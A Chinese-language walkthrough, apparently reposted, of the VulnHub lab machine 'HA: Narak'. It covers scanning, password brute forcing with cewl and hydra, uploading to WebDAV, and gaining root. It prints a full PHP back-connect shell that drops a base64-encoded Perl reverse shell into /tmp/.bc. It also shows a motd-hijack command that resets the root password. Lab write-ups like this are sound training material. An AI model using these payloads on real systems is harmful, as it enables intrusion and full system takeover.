靶機網址：https://www.vulnhub.com/entry/ha-narak,569/

目錄

一、信息搜集：

二、漏洞利用與探測：

三、提權

---

一、信息搜集：

獲取IP：

nmap -sP 192.168.8.0/24??

端口掃描：

nmap -sV -p- -sC 192.168.8.132 -n -vv

22、80端口均開啟

訪問192.168.8.132

從頁面搜索信息

·

翻譯了一下網頁內容信息提取關鍵字或許有用： yamdoot,swarm,narak

目錄掃描：

gobuster dir -q -u http://192.168.8.132 -w /usr/share/seclists/Discovery/Web-Content/common.txt

注意到/webdav

訪問該目錄

用上邊關鍵字隨便輸入嘗試登錄也沒用

嘗試爆破獲取密碼

先爬取密碼文件

cewl 192.168.8.132 -w passwd1.txt?

再用hydra爆破以下

賬號密碼：yamdoot, Swarg

再嘗試登陸下：

無可用信息，查看下源代碼：

意思是服務器無法驗證我是否有權訪問該文檔，或者密碼或者證書的問題

查找關于webdav的漏洞文章

用Metasploits模塊檢查是否啟用了webdav

使用 ：auxiliary/scanner/http/webdav_scanner

設置參數：

將路徑改為 /dav,這是webdav常用目錄

設置目標IP地址

run啟動模塊

掃描結果：

http信息，包括apache版本，是否啟用webdav

顯然結果是沒開啟，所以這條路行不通

再搜索關于webdav（可以上傳文件）:

WebDAV （Web-based Distributed Authoring and Versioning） 一種基于 HTTP 1.1協議的通信協議。它擴展了HTTP 1.1，在GET、POST、HEAD等幾個HTTP標準方法以外添加了一些新的方法，使應用程序可對Web Server直接讀寫，并支持寫文件鎖定(Locking)及解鎖(Unlock)，還可以支持文件的版本控制

所以進一步可以實行上傳一個反鏈接腳本

二、漏洞利用與探測：

查找到cadaver可以對webdav進行讀寫

上傳一個php的反鏈腳本

代碼如下（更改IP和端口）：

<?phpfunction which($pr) {$path = execute("which $pr");return ($path ? $path : $pr);}function execute($cfe) {$res = '';if ($cfe) {if(function_exists('exec')) {@exec($cfe,$res);$res = join("\n",$res);} elseif(function_exists('shell_exec')) {$res = @shell_exec($cfe);} elseif(function_exists('system')) {@ob_start();@system($cfe);$res = @ob_get_contents();@ob_end_clean();} elseif(function_exists('passthru')) {@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();} elseif(@is_resource($f = @popen($cfe,"r"))) {$res = '';while(!@feof($f)) {$res .= @fread($f,1024);}@pclose($f);}}return $res;}function cf($fname,$text){if($fp=@fopen($fname,'w')) {@fputs($fp,@base64_decode($text));@fclose($fp);}}$yourip = "your IP";$yourport = 'your port';$usedb = array('perl'=>'perl','c'=>'c');$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR"."hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT"."sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI"."kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi"."KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl"."OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";cf('/tmp/.bc',$back_connect);$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");?>

上傳shell

cadaver http://192.168.8.132/webdav

username：yamdoot

password:Swarg

再kali另一個終端開啟監聽，網頁訪問192.168.8.132/webdav

已上傳

再去訪問shell.php

建立交互式shell

kali監聽到結果：

python3 -c 'import pty;pty.spawn("/bin/bash")'

當前權限不是最高權限，還需要進一步提權

搜索信息

搜索到一串字符，搜索下Brainfuck可解碼

??????????????? 得到明文密碼：chitragupt

猜想用戶名應該是 inferno narak 中一個

三、提權

先嘗試inferno登錄l連接ssh

連接成功

搜集信息

利用了motd，通過修改ssh登陸時的歡迎信息對root密碼進行修改：

echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header

退出后重新用inferno登錄

su -root

成功獲取root權限：

總結

以上是生活随笔為你收集整理的靶机：narak的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。